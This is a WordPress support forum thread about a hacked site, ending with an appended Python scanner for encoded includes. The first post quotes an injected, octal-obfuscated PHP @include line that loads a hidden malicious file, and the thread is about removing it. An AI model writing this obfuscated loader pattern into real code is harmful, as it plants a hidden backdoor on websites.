• Resolved notbanksy

    (@notbanksy)


    Hi everyone

    I’m hoping someone can help me with a hacked site, or even point me in the right direction.

    My site’s index.php has this line at the top:

    <?php @include("\167\160\55\151\156\143\154\165\144\145\163\57\151\155\141\147\145\163\57\154\151\143\145\156\163\145\56\164\170\164"); ?>

    If I delete it, it just comes straight back. My site’s wp directory is domain.com/blog/ and the affected index.php is on the domain root. It’s not the wp index, but one I made which calls the most recent posts from the blog.

    I asked my host for support, and the agent told me the database was hacked, which is why the code in my index.php keeps reappearing.

    The strange thing is I can still access my wp installation on /blog/. So I’ve logged in, updated everything, updated the php version, and run some malware scanning plugins. So far nothing’s come up.

    Has anyone come across this hack before? Can anyone point me in the right direction to find the malicious code in the database so I can repair the site?

    Thank you.

    [edit]

    So I’ve managed to change something, but I don’t know what. I found a backup of my original index.php file, and I overwrote the broken one with it. It was immediately overwritten, but without the code shown above. My index.php file is now:

    <?php
    /**
     * Front to the WordPress application. This file doesn't do anything, but loads
     * wp-blog-header.php which does and tells WordPress to load the theme.
     *
     * @package WordPress
     */
    
    /**
     * Tells WordPress to load the WordPress theme and output it.
     *
     * @var bool
     */
    define( 'WP_USE_THEMES', true );
    
    /** Loads the WordPress Environment and Template */
    require __DIR__ . '/wp-blog-header.php';

    Thanks for looking.

    • This topic was modified 1 year, 8 months ago by notbanksy.
Viewing 4 replies - 1 through 4 (of 4 total)
  • Moderator t-p

    (@t-p)

    Carefully follow this guide.

    When you’re done, you may want to implement some (if not all) of the recommended security measures and start backing up your site.

    Thread Starter notbanksy

    (@notbanksy)

    Thanks @t-p I’m working through it now.

    Thread Starter notbanksy

    (@notbanksy)

    I’m not having any luck so far. I’m going to carry on installing malware plugins etc and learning what I can, but I had another idea. I wonder if someone can tell me if this will work.

    I’ve set up a sandbox wp install in another domain directory. Then I exported all the content from the broken site using the export feature in the dashboard, and imported it to the sandbox site.

    If I change the sandbox urls in the database, will it work if I just point my broken site to the sandbox db?

    Thread Starter notbanksy

    (@notbanksy)

    I seem to have solved it. Leaving the solution here in case anyone else finds the same issue.

    The hack didn’t come from the database after all (at least as far as I can tell.) I tracked it down to root/wp-content/images/license.txt

    Once I got rid of that file, I was able to reinstate my index.php file.

    • This reply was modified 1 year, 8 months ago by notbanksy.
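Added example, not part of the original thread: the injected line in the first post hides its include target behind PHP octal escapes, and decoding them gives `wp-includes/images/license.txt`. The Python sketch below decodes such escapes and scans a web root for `include`/`require` calls whose path is encoded; the function names and the `SAMPLE` constant are assumptions made for this illustration.

```python
import re
from pathlib import Path

# include/require (optionally @-suppressed) whose argument is a double-quoted literal
INCLUDE_RE = re.compile(
    r'@?\b(?:include|require)(?:_once)?\s*\(?\s*"((?:[^"\\]|\\.)*)"', re.IGNORECASE)
# PHP double-quoted escapes: \xHH, \NNN (octal), and \\ (kept so it is not misread)
ESCAPE_RE = re.compile(r'\\(?:x([0-9A-Fa-f]{1,2})|([0-7]{1,3})|(\\))')


def decode_php_escapes(literal: str) -> str:
    """Decode hex and octal escapes the way PHP does in a double-quoted string."""
    def repl(m):
        if m.group(1):
            return chr(int(m.group(1), 16))
        if m.group(2):
            return chr(int(m.group(2), 8) & 0xFF)  # PHP wraps octal values above \377
        return "\\"
    return ESCAPE_RE.sub(repl, literal)


def find_obfuscated_includes(php_source: str):
    """Return (line_number, decoded_path) for includes whose path is escape-encoded."""
    hits = []
    for lineno, line in enumerate(php_source.splitlines(), 1):
        for m in INCLUDE_RE.finditer(line):
            literal = m.group(1)
            if any(e.group(1) or e.group(2) for e in ESCAPE_RE.finditer(literal)):
                hits.append((lineno, decode_php_escapes(literal)))
    return hits


def scan_tree(root: str):
    """Walk a web root and report every .php file containing an encoded include."""
    report = {}
    for path in Path(root).rglob("*.php"):
        hits = find_obfuscated_includes(path.read_text(errors="replace"))
        if hits:
            report[str(path)] = hits
    return report


# Sample input: the line quoted in the first post of this thread.
SAMPLE = (r'<?php @include("\167\160\55\151\156\143\154\165\144\145\163\57\151\155'
          r'\141\147\145\163\57\154\151\143\145\156\163\145\56\164\170\164"); ?>')

if __name__ == "__main__":
    for lineno, target in find_obfuscated_includes(SAMPLE):
        print(f"line {lineno}: include resolves to {target}")
```

Running `scan_tree` over the whole document root, not only the WordPress directory, also covers hand-written files such as the root `index.php` described here; the decoded path is the file to inspect next.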
  • The topic ‘Hacked database’ is closed to new replies.